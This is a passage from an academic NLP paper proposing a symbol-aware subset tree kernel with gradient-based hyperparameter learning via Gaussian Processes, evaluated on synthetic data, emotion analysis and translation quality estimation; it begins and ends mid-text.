λ. The original goal of λ is to act as a decay factor that penalizes contributions from larger fragments cf smaller ones (and therefore, it should be in the [0, 1] interval). Without this factor, the resulting distribution over tree pairs is skewed, giving extremely large values when trees are equal and rapidly decreasing for small differences over fragment counts. The decay factor helps to spread this distribution, effectively giving smaller weights to larger fragments. The function ∆ can be defined recursively, ∆(n1,n2) =    0 pr(n1) 6= pr(n2) λ pr(n1) = pr(n2) ∧ preterm(n1) λg(n1,n2) otherwise, where pr(n) is the grammar production at node n and preterm(n) returns true if n is a pre-terminal node. The function g is defined as follows: g(n1,n2) = |n1|∏ i=1 (α + ∆(cin1,c i n2 )) , (3) where |n| is the number of children of node n and cin is the i th child of node n. This recursive defini- tion is calculated efficiently by employing dynamic programming to cache intermediate ∆ results. Equation 3 also adds another hyperparameter, α. This hyperparameter was introduced by Moschitti (2006b)3 as a way to select between two differ- ent tree kernels. If α = 1, we get the original SSTK, if α = 0, then we obtain the Subtree Kernel, which only allows fragments with terminal symbols 3In his original formulation, this hyperparameter was named σ but here we use α to not confuse it with the GP noise hyper- parameter. 463 as leaves. We can also interpret the Subtree Kernel as a “sparse” version of the SSTK, where the “non- subtree” fragments have their weights equal to zero. Even though fragment weights are affected by both kernel hyperparameters, previous work did not discuss their effects. The usual procedure fixes α to 1 (selecting the original SSTK) and sets λ to a de- fault value (around 0.4). As explained in §2, the GP model selection procedure enables us to learn fine- grained values for these hyperparameters, which can lead to better performing models and aid interpreta- tion. Furthermore, it also allows us to extend these kernels by adding new hyperparameters. We pro- pose one such kernel in the next Section. 3.1 Symbol-aware Subset Tree Kernel While varying the SSTK hyperparameters can lead to different weight schemes, they do that in a very coarse way. For some applications, it may be nec- essary to give more weight to specific fragments or set of fragments (e.g., NPs being more impor- tant than ADVP in an information extraction set- ting). The Symbol-aware Subset Tree Kernel (hence- forth, SASSTK), which we introduce here, allows a more fine-grained control over the weights by em- ploying one λ and one α hyperparameter for each non-terminal symbol in the training data. The calcu- lation uses a similar recursive formula to the SSTK, namely: ∆(n1,n2) =    0 pr(n1) 6= pr(n2) λx pr(n1) = pr(n2) ∧ preterm(n1) λxgx(n1,n2) otherwise, where x is the symbol at node n1 and gx(n1,n2) = |n1|∏ i=1 (αx + ∆(c i n1 ,cin2 )) . (4) The SASSTK can be interpreted as a generaliza- tion of the SSTK: we can recover the latter by tying all λ and setting all α = 1. By employing different hyperparameter values for each specific symbol, we can effectively modify the weights of all fragments where the symbol appears. Table 1 shows an exam- ple where we unrolled a kernel computation into its corresponding feature space, showing the resulting weighted counts for each feature. λS = 1 λA = 1 λB = 1 λS = .5 λA = 1 λB = 1 λS = 2 λA = 1 λB = 1 A → a 1 1 1 B → b 1 1 1 S → A B 1 0.5 2 S → (A a) B 1 0.5 2 S → A (B b) 1 0.5 2 S → (A a) (B b) 1 0.5 2 k(t,t) 6 3 18 Table 1: Resulting fragment weighted counts for the ker- nel evaluation k(t,t), for different values of hyperparam- eters, where t is the tree in Figure 1. 3.2 Kernel Gradients To enable hyperparameter optimization via gradient descent we must provide gradients for the kernels. In this Section we derive the gradients for SASSTK. From Equation 2 we know that the kernel is a dou- ble summation over the ∆ function. Therefore all gradients are also double summations, but over the gradients of ∆. We can obtain these in a vectorized way, by considering the gradients of the hyperpa- rameter vectors λ and α over ∆. Let k be the num- ber of symbols considered in the model and λ and α be k-dimensional vectors containing the respec- tive hyperparameters. In the following, we use the notation ∆i as a shorthand for ∆(cin1,c i n2 ) and we also omit the pa- rameters of gx. We start with the λ gradient: ∂∆ ∂λ =    0 pr(n1) 6= pr(n2) u pr(n1) = pr(n2) ∧ preterm(n1) ∂(λxgx) ∂λ otherwise, where x is the symbol at n1, gx is defined in Equa- tion 4 and u is the k-dimensional unit vector with the element corresponding to symbol x equal to 1 and all others equal to 0. The gradient in the third case is defined recursively, ∂(λxgx) ∂λ = ugx + λx ∂gx ∂λ = ugx + λx |n1|∑ i=1 gx αx + ∆i ∂∆i ∂λ . 464 The α gradient is derived in a similar way, ∂∆ ∂α =    0 pr(n1) 6= pr(n2) ∨ preterm(n1) ∂(λxgx) ∂α otherwise, and the gradient at the second case is also defined recursively, ∂(λxgx) ∂α = λx ∂gx ∂α = λx |n1|∑ i=1 gx αx + ∆i ( u + ∂∆i ∂α ) . Gradients can be efficiently obtained using dy- namic programming. In fact, they can be calculated at the same time as ∆ to improve performance since they all share many terms in their derivations. Fi- nally, we can easily obtain the gradients for the orig- inal SSTK by letting u = 1. 3.3 Kernel Normalization It is common practice when using tree kernels to nor- malize the kernel. This helps reduce the random ef- fect of tree size. Normalization can be achieved us- ing the following, where k̂ is the normalized kernel: k̂(t1, t2) = k(t1, t2)√ k(t1, t1)k(t2, t2) . To apply this normalized version in the optimiza- tion procedure we must also derive gradients for the normalization function. In the following equation, we use kij and k̂ij as a shorthand for k(ti, tj) and k̂(ti, tj), respectively: ∂k̂12 ∂θ = ∂k12 ∂θ√ k11k22 − k̂12 ∂k11 ∂θ k22 + k11 ∂k22 ∂θ 2k11k22 . 3.4 Other Extensions Many other structural kernels rely on recursive def- initions and dynamic programming to perform their calculations. Examples include other tree kernels like the Partial Tree Kernel (Moschitti, 2006a) and string kernels like the ones defined on character n- grams (Lodhi et al., 2002) or word sequences (Can- cedda et al., 2003). While in this paper we focus on the SSTK (and our proposed SASSTK), our ap- proach can easily be extended to these other kernels, as long as all the corresponding recursive definitions are differentiable. 4 Synthetic Data Experiments A natural question that arises in the proposed method is how much data is needed to accurately learn the kernel hyperparameters. To answer this question, we run a set of experiments using synthetic data. We generate this data by using a set of 1000 natural language syntactic trees, where we fix a ran- dom subset of 200 instances for testing and use the remaining 800 instances as training. For each train- ing set size we define a GP over the full dataset, sam- ple a function from it and use the function output as the response variable for each tree. We try two dif- ferent GP priors, one using the SSTK and another one using the SASSTK. The conditions above provide a controlled envi- ronment to check the modelling capacities of our ap- proach since we know the exact distribution where the data comes from. The reasoning behind these experiments is that to be able to provide benefits in real tasks, where the data distribution is not known, our models have to be learnable in this controlled setting as well using a reasonable amount of data. Finally, we also provide an empirical evaluation comparing the speed performance between our ap- proach and grid search. 4.1 SSTK Prior Our first experiments use a SSTK as the kernel with λ = 0.001,α = 1 and σ2n = 0.01. After obtaining the input trees and their sampled labels, we define a new GP model using only the training data plus the obtained response variables, this time using a SSTK with randomized hyperparameter values. Then we optimize the GP and check if the learned hyperpa- rameters are close to the original ones, using 10 ran- dom restarts to limit the effect of local optima. We also use the optimized GP to predict response vari- ables on the test set and measure Root Mean Squared Error (RMSE). Our hypothesis is that with a reason- able sample size we can retrieve the original hyper- parameter values and obtain low RMSE. For each training set size, we repeat the experiment 20 times. 465 Figure 2 shows the results of these experiments. For small sizes the variance in the resulting hyperpa- rameter values is large but as soon as we reach 200 instances we are able to retrieve the original values with high confidence. In other words, in an ideal set- ting 200 instances are enough to learn the kernel. It is also interesting to note that test RMSE after opti- mization steadily decreases as we increase training data size. This shows that if one is more interested in predictions themselves, it is still worth optimizing hyperparameters even if the training data is small. Figure 2: Results of synthetic experiments optimizing SSTK. The x axes correspond to different training set sizes and the the y axes are the obtained hyperparame- ter values in the first three plots and RMSE in the last plot. Dashed lines show the original hyperparameter val- ues. Points are offset in RMSE chart for legibility. 4.2 SASSTK Prior The large number of hyperparameters of the SASSTK makes it more prone to optimization and overfitting issues when compared to the SSTK. This raises the question of how much data is needed to justify its use. To address this question, we run sim- ilar experiments to those above for the SSTK, except that now we sample from a GP using a SASSTK as the kernel. Instead of optimizing all hyperparameters freely we use a simpler version where we tie λ and α for each symbol to the same value, except for the sym- bol ’S’. Effectively this version has one extra λ and one extra α (henceforth λS and αS) when compared to the SSTK. The GP prior hyperparameter values are set to λ = 0.001,λS = 0.5,α = 0.1,αS = 1 and σ2n = 0.01. For each training set size, we train two GPs, one using this SASSTK and one using the original SSTK, optimize them using 10 random restarts and measure RMSE on the test set. Results are shown in Figure 3. For all training set sizes the SASSTK reaches lower RMSE than SSTK, with a substantial difference after reaching 100 in- stances. This shows that even for small datasets our proposed kernel manages to capture aspects which can not be explained by the original SSTK. Note that this is an ideal setting, and real datasets may need to be larger to realize gains from SASSTK. Neverthe- less, these are promising results since they give evi- dence of a small lower bound on the dataset size for SASSTK to be effective. Figure 3: Results from synthetic experiments comparing SSTK and SASSTK. The x axis is training set size while the y axis corresponds to RMSE. 466 4.3 Performance Experiments To provide an overview of how efficient is the gradient-based method compared to grid search we also run a set of experiments measuring wall clock training time vs. RMSE on a test set. For both GP and SVM models we employ the SSTK as the kernel and we use the same synthetic data from the previ- ous experiments4. We perform 20 runs, keeping the test set as the same 200 instances for all runs and randomly sampling 200 instances from the remain- ing instances as training data. Figure 4 shows the curves for both GP and SVM models. The GP curve is obtained by increasing the maximum number of iterations of the gradient-based method (in this case, L-BFGS) and the SVM curve is obtained by increasing the granularity of the grid size. Figure 4: Results from performance experiments. The x axis corresponds to wall clock time in seconds and it is in log scale. The y axis shows RMSE on the test set. The blue dashed line corresponds to the RMSE value obtained after L-BFGS converged. Error bars are obtained by mea- suring one standard deviation over the 20 runs made in each experiment. We can see that optimizing the GP model is con- sistently much faster than doing grid search on the SVM model (notice the logarithmic scale), even though it shows some variance when letting L-BFGS run for a larger number of iterations. The GP model also is able to better predictions in general. Even when taking the variances into account, grid search would still need around 10 times more computation 4For specific details on the SVM models used in all experi- ments performed in this paper we refer the reader to Appendix A. time to achieve the same predictions obtained by the GP model. In real settings, SVMs predictions tend to be more on par with the ones provided by a GP (as shown in §5) but nevertheless these figures show that the GP can be much more time efficient when optimizing hyperparameters of a tree kernel. An important performance aspect to take into ac- count is parallelization. Grid search is embarass- ingly parallelizable since each grid point can run in a different core. However, the GP optimization can also benefit from multiple cores by running each ker- nel computation inside the Gram matrix in parallel. To keep the comparisons simpler, the results shown in this section use a single core but all experiments in §5 employ parallelization in the Gram matrix com- putation level (for both SVM and GP models). 5 NLP Experiments Our experiments with NLP data address two regres- sion tasks: Emotion Analysis and Quality Estima- tion. For both tasks, we use the Stanford parser (Manning et al., 2014) to obtain constituency trees for all sentences. Also, rather than using data official splits, we perform 5-fold cross-validation in order to obtain more reliable results. 5.1 Emotion Analysis The goal of Emotion Analysis is to automatically de- tect emotions in a text (Strapparava and Mihalcea, 2008). This problem is closely related to Opinion Mining (Pang and Lee, 2008), with similar appli- cations, but it is usually done at a more fine-grained level and involves the prediction of a set of labels for each text (one for each emotion) instead of a single label. Beck et al. (2014a) used a multi-task GP for this task with a bag-of-words feature representation. In theory, it is possible to combine their multi-task ker- nel with our tree kernels, but to keep the focus of the experiments on testing tree kernel approaches, here we use independently trained models, one per emo- tion. Dataset We use the dataset provided by the “Af- fective Text” shared task in SemEval2007 (Strap- parava and Mihalcea, 2007), which is composed of 1000 news headlines annotated in terms of six emo- tions: Anger, Disgust, Fear, Joy, Sadness and Sur- 467 prise. For each emotion, a score between 0 and 100 is given, 0 meaning total lack of emotion and 100, maximally emotional. Scores are mean-normalized before training the models. Models We perform experiments using the follow- ing tree kernels: • SSTK: the SSTK formulation introduced by Moschitti (2006b); • SASSTKfull: our proposed Symbol-Aware SSTK; • SASSTKS: same as before, but using only two λ and two α hyperparameters: one for sym- bols corresponding to full sentences5 and an- other for all other symbols. This configuration is similar to that in Section 4.2. For all kernels, we also use a variation fixing the α hyperparameters to 1 to emulate the original SSTK. Baselines and evaluation Our results are com- pared against three baselines: • SVM SSTK: a SVM using an SSTK kernel. • SVM BOW: same as before, but using an RBF kernel with a bag-of-words representation. • GP BOW: same as SVM BOW but using a GP instead. The SVM models are trained using a wrapper for LIBSVM6 (Chang and Lin, 2001) provided by the scikit-learn toolkit7 (Pedregosa et al., 2011) and op- timized via grid search. Following previous work, we use Pearson’s correlation coefficient as evalua- tion metric. Pearson’s scores are obtained by con- catenating all six emotions outputs together. Table 2 shows the results. The best GP model with tree kernels outperforms the SVMs, showing that the fine-grained model selection procedure pro- vided by the GP models is helpful when dealing with tree kernels. However, using the SASSTK models do not help in the case of free α and the SASSTKfull actually performs worse than the original SSTK, 5In this dataset, symbols are S, SQ, SBARQ and SINV . 6http://www.csie.ntu.edu.tw/˜cjlin/ libsvm 7http://scikit-learn.org even though the optimized marginal likelihood was higher. This is evidence that the SASSTKfull model is overfitting the training data, probably due to its large number of hyperparameters. Pearson’s SVM BOW 0.5690 SVM SSTK 0.5254 GP BOW 0.5891 (free α) GP SSTK 0.5713 GP SASSTKfull 0.5118 GP SASSTKS 0.5710 (fixed α = 1) GP SSTK 0.5093 GP SASSTKfull 0.5435 GP SASSTKS 0.5225 Table 2: Pearson’s correlation scores for the Emotion Analysis task (higher is better). Another interesting finding in Table 2 is that fix- ing the α values often harms performance. Inspect- ing the free α models showed that the values found by the optimizer were very close to zero. This in- dicates that the model selection procedure prefer towards giving smaller weights to incomplete tree fragments. We can interpret this as the model se- lecting a more lexicalized feature space, which also explains why the GP RBF model on bag-of-words performed the best in this task. Finally, to understand how the optimized kernels could provide more interpretability, Table 3 shows the top 15 λ values obtained by the SASSTKfull (fixed α variant) with their corresponding symbols. In this specific case the kernel does not give the best performance so there are limitations in doing a full linguistic analysis. Nevertheless, we believe this ex- ample shows the potential for developing more in- terpretable kernels. This is especially interesting be- cause these models take into account a much richer feature space than what it is allowed by parametric models. 5.2 Quality Estimation The goal of Quality Estimation is to provide a qual- ity prediction for new, unseen machine translated texts (Blatz et al., 2004; Bojar et al., 2014). Exam- 468 http://www.csie.ntu.edu.tw/~cjlin/libsvm http://www.csie.ntu.edu.tw/~cjlin/libsvm http://scikit-learn.org JJR 0.8333 WHADVP 0.5004 VBP 0.4653 PRP$ 0.6933 QP 0.5001 WHNP 0.4508 WDT 0.6578 JJS 0.4996 NN 0.4274 RBR 0.5445 NNS 0.4961 JJ 0.4021 VBG 0.5163 . 0.4777 SQ 0.4000 Table 3: Top 15 symbols sorted according to their ob- tained λ values in the SASSTKfull model with fixed α. The numbers are the corresponding λ values, averaged over all six emotions. ples of applications include filtering machine trans- lated sentences that would require more post-editing effort than translation from scratch (Specia et al., 2009), selecting the best translation from different MT systems (Specia et al., 2010) or between an MT system and a translation memory (He et al., 2010), and highlighting segments that need revision (Bach et al., 2011). While various quality metrics exist, here we focus on post-editing time prediction. Tree kernels have been used before in this task (with SVMs) by Hardmeier (2011) and Hardmeier et al. (2012). While their best models combine tree kernels with a set of explicit features, they also show good results using only the tree kernels. This makes Quality Estimation a good benchmark task to test our models. Datasets We use two publicly available datasets containing post-edited machine translated sentences. Both are composed of a set of source sentences, their machine translated outputs and the corresponding post-editing time. • French-English (fr-en): This dataset, de- scribed in (Specia, 2011), contains 2524 French sentences translated into English and post- edited by a novice translator. • English-Spanish (en-es): This dataset was used in the WMT14 Quality Estimation shared task (Bojar et al., 2014), containing 858 sen- tences translated from English into Spanish and post-edited by an expert translator. For each dataset, post-editing times are first di- vided by the translation output length (obtaining the post-editing time per word) and then mean normal- ized. Models Since our data consists of pairs of trees, our models in this task use a pair of tree kernels. We combine these two kernels by either summing or multiplying them. As for underlying tree ker- nels, we try both SSTK and SASSTKS. As in the Emotion Analysis task, we also experiment with a set of kernel configurations with the α hyperparam- eters fixed at 1. We also test models that combine our tree kernels with an RBF kernel on a set of 17 features extracted using the QuEst framework (Spe- cia et al., 2013). These features are part of a strong baseline model used by the WMT14 shared task. Baselines and evaluation We compare our results with a number of SVM models: • SVM SSTK: same as in the Emotion Analysis task, using either a sum (+) or a product (×) of SSTKs. • SVM RBF: this is an SVM trained on the 17 features extracted by Quest. • SVM RBF SSTK: a combination of the two models above. For further comparison, we also show results ob- tained using a GP model and an RBF kernel on the QuEst-only features. Following previous work, we measure prediction performance using both Mean Absolute Error (MAE) and RMSE. The prediction results are given in Table 4. They indicate a number of interesting findings: • For the fr-en dataset, the GP models combining tree kernels with an RBF kernel outperform all other models. Results for the en-es dataset are less consistent, probably due to the small size of the dataset, but on average they are better than their SVM counterparts. • The SVMs using a combination of kernels performs worse than using the RBF kernel alone. Inspecting the models, we found that grid search actually harms performance. For instance, for the fr-en dataset, MAE and RMSE for the RBF + SSTK × model before grid search are 0.4681 and 0.6016, respectively. On the other hand, for this dataset all GP models achieve better results after optimization. 469 • Unlike in the Emotion Analysis task, fixing α results in better performance, even though the resulting models have lower marginal likeli- hood than the ones with free α. The same effect happened when comparing the SASSTK mod- els with the SSTK ones for the en-es dataset. Both cases are evidence of model overfitting. French-English English-Spanish MAE RMSE MAE RMSE (SVM) RBF 0.4610 0.5944 0.7831 1.0238 SSTK + 0.4710 0.6006 0.7777 1.0820 SSTK × 0.4681 0.6016 0.7884 1.1044 RBF SSTK + 0.5146 0.6267 0.8077 1.0295 RBF SSTK × 0.5186 0.6299 0.8367 1.0427 GP RBF 0.4555 0.5830 0.7842 1.0735 (GP free α) SSTK + 0.4789 0.5912 0.7551 1.0281 SSTK × 0.4804 0.5843 0.7440 1.0008 SASSTKS + 0.4756 0.5889 0.8096 1.0754 SASSTKS × 0.4797 0.5868 0.7484 1.0102 (GP fixed α = 1) SSTK + 0.4694 0.5808 0.7614 1.0019 SSTK × 0.4708 0.5733 0.7205 0.9870 SASSTKS + 0.4758 0.5888 0.8242 1.0912 SASSTKS × 0.4699 0.5751 0.7469 1.0280 (GP fixed α = 1) RBF SSTK + 0.4408 0.5651 0.7591 1.0469 RBF SSTK × 0.4443 0.5659 0.7389 1.0302 RBF SASSTKS + 0.4406 0.5648 0.7692 1.0682 RBF SASSTKS × 0.4440 0.5658 0.7682 1.0628 Table 4: Error scores for the Quality Estimation task (lower is better). Results are in terms of post-editing time per word. Bold scores are the best ones for each dataset. We also inspect the resulting hyperparameters to obtain insights about the features used by the model. Table 5 shows the optimized λ values for the GP SSTK models with fixed α for the fr-en dataset. The λ values obtained are higher for the target sentence kernels than for the source sentence ones. We can interpret this as the model giving preference to fea- tures from the target trees instead of the source trees, which is what we would expect for this task. 5.3 Overfitting Both NLP tasks show evidence that the GP models with large number of hyperparameters (SASSTKfull in the case of Emotion Analysis and the free α mod- els in Quality Estimation) are overfitting the cor- responding datasets. While the Bayesian formula- λsrc λtgt GP SSTK + 0.1394 0.3108 GP SSTK × 0.1405 0.2641 Table 5: Learned hyperparameters for the GP SSTK mod- els in the fr-en dataset, with α fixed at 1. λsrc and λtgt are the hyperparameters corresponding to the kernels on the source and target parse trees, respectively. The values shown are averaged over the cross-validation results. tion for the marginal likelihood does help limiting overfitting, it does not prevent it completely. Small datasets or invalid assumptions about the Gaussian distribution of the data may still lead to poorly fitting models. Another means of reducing overfitting is by taking a fully Bayesian approach in which hyperpa- rameters are considered as random variables and are marginalized out (Osborne, 2010); this is a research direction we plan to pursue in the future.8 5.4 Extensions to Other Tasks The GP framework introduced in Section 2 can be extended to non-regression problems by chang- ing the likelihood function. For instance, models for classification (Rasmussen and Williams, 2006, Chap. 3), ordinal regression (Chu and Ghahramani, 2005) and structured prediction (Altun et al., 2004; Bratières et al., 2013) were proposed in the liter- ature. Since the likelihood is independent of the kernel, a natural future step is to apply the kernels and models introduced in this paper to different NLP tasks. In light of that, we did initial experiments with constituency parsing reranking.9 The first results were inconclusive but we do believe this is because we employed naive approaches using classification (1-best result vs. all) and regression (using PARSE- VAL metrics as the response variable) models. A more appropriate way to tackle this task is by em- ploying a reranking-based likelihood and this is a direction we plan to pursue in the future. 6 Related Work Interest in model selection procedures for kernel- based methods has been growing in the last years. 8See also Rasmussen and Williams (2006, Chap. 5) for an in-depth discussion on this issue. 9We thank the anonymous reviewers for this suggestion. 470 One widely used approach for that is Multiple Ker- nel Learning (MKL) (Gönen and Alpaydın, 2011). MKL is based on the idea of using combinations of kernels to model the data and developing algo- rithms to tune the kernel coefficients. This is dif- ferent from our method, where we focus on learning the hyperparameters of a single structural kernel. An approach similar to ours was proposed by Igel et al. (2007). They combine oligo kernels (a kind of n- gram kernel) with MKL, derive their gradients and optimize towards a kernel alignment metric. Com- pared to our approach, they restrict the length of the n-grams being considered, while we rely on dy- namic programming to explore the whole substruc- ture space. Also, their method does not take into account the underlying learning algorithm. Another recent approach proposed for model selection is ran- dom search (Bergstra and Bengio, 2012). Like grid search, it has the drawback of not employing gra- dient information, as it is designed for any kind of hyperparameters (including categorical ones). Structural kernels have been successfully em- ployed in a number of NLP tasks. The original SSTK proposed by Collins and Duffy (2001) was used to rerank the output of syntactic parsers. Re- cently, this reranking idea was also applied to dis- course parsing (Joty and Moschitti, 2014). Other tree kernel applications include Semantic Role La- belling (Moschitti et al., 2008) and Relation Extrac- tion (Plank and Moschitti, 2013). String kernels were mostly used in Text Classification (Lodhi et al., 2002; Cancedda et al., 2003), while graph ker- nels have been used for recognizing Textual Entail- ment (Zanzotto and Dell’Arciprete, 2009). How- ever, these previous works focused on frequentist methods like SVM or voted perceptron while we employ a Bayesian approach. Gaussian Processes are a major framework in machine learning nowadays: applications in- clude Robotics (Ko et al., 2007), Geolocation (Schwaighofer et al., 2004) and Computer Vision (Sinz et al., 2004). Only very recently they have been successfully employed in a few NLP tasks such as translation quality estimation (Cohn and Specia, 2013; Beck et al., 2014b), detection of temporal pat- terns in text (Preoţiuc-Pietro and Cohn, 2013), se- mantic similarity (Rios and Specia, 2014) and emo- tion analysis (Beck et al., 2014a). In terms of feature representations, previous work focused on the vecto- rial inputs and applied well-known kernels for these inputs, e.g. the RBF kernel. As shown on §5.2, our approach is orthogonal to these previous ones, since kernels can be easily combined in different ways. It is important to note that we are not the first ones to combine GPs with kernels on structured inputs. Driessens et al. (2006) employed a combination of GPs and graph kernels for reinforcement learning. However, unlike our approach, they did not attempt model selection, evaluating only a few hyperparam- eter values empirically. 7 Conclusions This paper describes a Bayesian approach for struc- tural kernel learning, based on Gaussian Processes for easy model selection. Experiments applying our models to synthetic data showed that it is possible to learn structural kernel hyperparameters using a fairly small amount of data. Furthermore we ob- tained promising results in two NLP tasks, includ- ing Quality Estimation, where we beat the state of the art. Finally, we showed how these rich parame- terizations can lead to more interpretable kernels. Beyond empirical improvements, an important goal of this paper is to present a method that en- ables new kernel developments through the exten- sion of the number of hyperparameters. We focused on the Subset Tree Kernel, proposing an extension and then deriving its gradients. This approach can be applied to any structural kernel, as long as gradi- ents are available. It is our hope that this work will serve as a starting point for future developments in these research directions. Acknowledgements Daniel Beck was supported by funding from CNPq/Brazil (No. 237999/2012-9). Dr. Cohn is the recipient of an Australian Research Council Future Fellowship (project number FT130101105). The au- thors would also like to thank the three anonymous reviewers for their helpful comments and sugges- tions. References Yasemin Altun, Thomas Hofmann, and Alexander J. Smola. 2004. Gaussian Process Classification for 471 Segmenting and Annotating Sequences. In Proceed- ings of ICML. Nguyen Bach, Fei Huang, and Yaser Al-Onaizan. 2011. Goodness: A Method for Measuring Machine Trans- lation Confidence. In Proceedings of ACL, pages 211– 219. Daniel Beck, Trevor Cohn, and Lucia Specia. 2014a. Joint Emotion Analysis via Multi-task Gaussian Pro- cesses. In Proceedings of EMNLP, pages 1798–1803. Daniel Beck, Kashif Shah, and Lucia Specia. 2014b. SHEF-Lite 2.0 : Sparse Multi-task Gaussian Processes for Translation Quality Estimation. In Proceedings of WMT14, pages 307–312. James Bergstra and Yoshua Bengio. 2012. Random Search for Hyper-Parameter Optimization. Journal of Machine Learning Research, 13:281–305. John Blatz, Erin Fitzgerald, and George Foster. 2004. Confidence estimation for machine translation. In Proceedings of the 20th Conference on Computational Linguistics, pages 315–321. Ondej Bojar, Christian Buck, Christian Federmann, Barry Haddow, Philipp Koehn, Johannes Leveling, Christof Monz, Pavel Pecina, Matt Post, Herve Saint- amand, Radu Soricut, Lucia Specia, and Aleš Tam- chyna. 2014. Findings of the 2014 Workshop on Statistical Machine Translation. In Proceedings of WMT14, pages 12–58. Sébastien Bratières, Novi Quadrianto, and Zoubin Ghahramani. 2013. Bayesian Structured Prediction using Gaussian Processes. arXiv:1307.3846, pages 1– 17. Nicola Cancedda, Eric Gaussier, Cyril Goutte, and Jean- Michel Renders. 2003. Word-Sequence Kernels. The Journal of Machine Learning Research, 3:1059–1082. Chih-Chung Chang and Chih-Jen Lin. 2001. LIBSVM : A Library for Support Vector Machines. ACM Trans- actions on Intelligent Systems and Technology (TIST), 2(3):1–39. Wei Chu and Zoubin Ghahramani. 2005. Gaussian Pro- cesses for Ordinal Regression. Journal of Machine Learning Research, 6:1019–1041. Trevor Cohn and Lucia Specia. 2013. Modelling Anno- tator Bias with Multi-task Gaussian Processes: An Ap- plication to Machine Translation Quality Estimation. In Proceedings of ACL, pages 32–42. Michael Collins and Nigel Duffy. 2001. Convolution Kernels for Natural Language. In Proceedings of NIPS, pages 625–632. Kurt Driessens, Jan Ramon, and Thomas Gärtner. 2006. Graph Kernels and Gaussian Processes for Relational Reinforcement Learning. Machine Learning, 64(1- 3):91–119. Mehmet Gönen and Ethem Alpaydın. 2011. Multi- ple kernel learning algorithms. Journal of Machine Learning Research, 12:2211–2268. Christian Hardmeier, Joakim Nivre, and Jörg Tiedemann. 2012. Tree Kernels for Machine Translation Quality Estimation. In Proceedings of WMT12, pages 109– 113. Christian Hardmeier. 2011. Improving Machine Trans- lation Quality Prediction with Syntactic Tree Kernels. In Proceedings of EAMT, pages 233–240. David Haussler. 1999. Convolution Kernels on Discrete Structures. Technical report, University of California at Santa Cruz. Yifan He, Yanjun Ma, Josef van Genabith, and Andy Way. 2010. Bridging SMT and TM with Translation Recommendation. In Proceedings of ACL, pages 622– 630. James Hensman, Nicolò Fusi, and Neil D. Lawrence. 2013. Gaussian Processes for Big Data. In Proceed- ings of UAI, pages 282–290. Christian Igel, Tobias Glasmachers, Britta Mersch, and Nico Pfeifer. 2007. Gradient-based Optimization of Kernel-Target Alignment for Sequence Kernels Ap- plied to Bacterial Gene Start Detection. IEEE/ACM Transactions on Computational Biology and Bioinfor- matics, 4(2):216–226. Shafiq Joty and Alessandro Moschitti. 2014. Discrimi- native Reranking of Discourse Parses Using Tree Ker- nels. In EMNLP, pages 2049–2060. Jonathan Ko, Daniel J. Klein, Dieter Fox, and Dirk Haehnel. 2007. Gaussian Processes and Reinforce- ment Learning for Identification and Control of an Au- tonomous Blimp. In Proceedings of IEEE Interna- tional Conference on Robotics and Automation, pages 742–747. Huma Lodhi, Craig Saunders, John Shawe-Taylor, Nello Cristianini, and Chris Watkins. 2002. Text Classifi- cation using String Kernels. The Journal of Machine Learning Research, 2:419–444. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David McClosky. 2014. The Stanford CoreNLP Natural Language Pro- cessing Toolkit. In Proceedings of ACL Demo Session, pages 55–60. Alessandro Moschitti, Daniele Pighin, and Roberto Basili. 2008. Tree Kernels for Semantic Role Label- ing. Computational Linguistics, pages 1–32. Alessandro Moschitti. 2006a. Efficient Convolution Ker- nels for Dependency and Constituent Syntactic Trees. In Proceedings of ECML, pages 318–329. Alessandro Moschitti. 2006b. Making Tree Kernels practical for Natural Language Learning. In EACL, pages 113–120. 472 Michael Osborne. 2010. Bayesian Gaussian Processes for Sequential Prediction, Optimisation and Quadra- ture. Ph.D. thesis, University of Oxford. Bo Pang and Lillian Lee. 2008. Opinion Mining and Sentiment Analysis. Foundations and Trends in Infor- mation Retrieval, 2(12):1–135. Fabian Pedregosa, Gaël Varoquaux, Alexandre Gram- fort, Vincent Michel, Bertrand Thirion, Olivier Grisel, Mathieu Blondel, Peter Prettenhofer, Ron Weiss, Vin- cent Duborg, Jake Vanderplas, Alexandre Passos, David Cournapeau, Matthieu Brucher, Matthieu Per- rot, and Édouard Duchesnay. 2011. Scikit-learn: Ma- chine learning in Python. Journal of Machine Learn- ing Research, 12:2825–2830. Daniele Pighin and Alessandro Moschitti. 2010. On Re- verse Feature Engineering of Syntactic Tree Kernels. In Proceedings of CONLL, pages 223–233. Barbara Plank and Alessandro Moschitti. 2013. Embed- ding Semantic Similarity in Tree Kernels for Domain Adaptation of Relation Extraction. In Proceedings of ACL, pages 1498–1507. Daniel Preoţiuc-Pietro and Trevor Cohn. 2013. A tem- poral model of text periodicities using Gaussian Pro- cesses. In Proceedings of EMNLP, pages 977–988. Carl Edward Rasmussen and Christopher K. I. Williams. 2006. Gaussian processes for machine learning, vol- ume 1. MIT Press Cambridge. Miguel Rios and Lucia Specia. 2014. UoW : Multi-task Learning Gaussian Process for Semantic Textual Sim- ilarity. In Proceedings of SemEval, pages 779–784. Anton Schwaighofer, Marian Grigoras, Volker Tresp, and Clemens Hoffmann. 2004. GPPS: A Gaussian Pro- cess Positioning System for Cellular Networks. In Proceedings of NIPS, pages 579–586. Fabian H. Sinz, Joaquin Quiñonero Candela, Gökhan H. Bakır, Carl E. Rasmussen, and Matthias O. Franz. 2004. Learning Depth from Stereo. Pattern Recog- nition, pages 1–8. Lucia Specia, Nicola Cancedda, Marc Dymetman, Marco Turchi, and Nello Cristianini. 2009. Estimating the sentence-level quality of machine translation systems. In Proceedings of EAMT, pages 28–35. Lucia Specia, Dhwaj Raj, and Marco Turchi. 2010. Ma- chine translation evaluation versus quality estimation. Machine Translation, 24(1):39–50. Lucia Specia, Kashif Shah, José G. C. De Souza, and Trevor Cohn. 2013. QuEst - A translation quality estimation framework. In Proceedings of ACL Demo Session, pages 79–84. Lucia Specia. 2011. Exploiting Objective Annotations for Measuring Translation Post-editing Effort. In Pro- ceedings of EAMT, pages 73–80. Carlo Strapparava and Rada Mihalcea. 2007. SemEval- 2007 Task 14 : Affective Text. In Proceedings of Se- mEval, pages 70–74. Carlo Strapparava and Rada Mihalcea. 2008. Learning to identify emotions in text. In Proceedings of the 2008 ACM Symposium on Applied Computing, pages 1556– 1560. Fabio Massimo Zanzotto and Lorenzo Dell’Arciprete. 2009. Efficient kernels for sentence pair classification. In Proceedings of EMNLP, pages 91–100. A Details on SVM Baselines All SVM baselines employ the �-insensitve loss function. Grid search optimization is done via 3- fold cross-validation on the 